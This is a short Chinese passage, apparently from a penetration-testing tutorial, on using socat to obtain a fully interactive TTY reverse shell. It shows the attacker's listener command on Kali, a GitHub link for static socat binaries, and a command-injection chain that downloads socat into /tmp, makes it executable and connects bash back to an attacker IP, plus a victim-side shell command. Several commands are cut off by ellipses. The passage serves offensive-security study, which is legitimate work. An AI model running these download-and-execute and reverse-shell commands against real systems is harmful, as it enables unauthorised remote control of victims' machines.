方法2:使用socat
socat是一个netcat上的替代工具,可以说是nc的增强版。我们可以使用Socat通过TCP连接传递完整的TTY。...如果你成功在目标机器安装了socat,那么我们就可以通过以下命令来获取到一个完全交互式的TTY反向shell:
在kali虚拟机我们运行以下侦听命令:
socat file:`tty`,raw,echo...socat你可以通过以下Github地址,下载相关的二进制静态文件进行安装:
https://github.com/andrew-d/static-binaries
通过命令注入漏洞,我们可以将socat...-O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4...:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint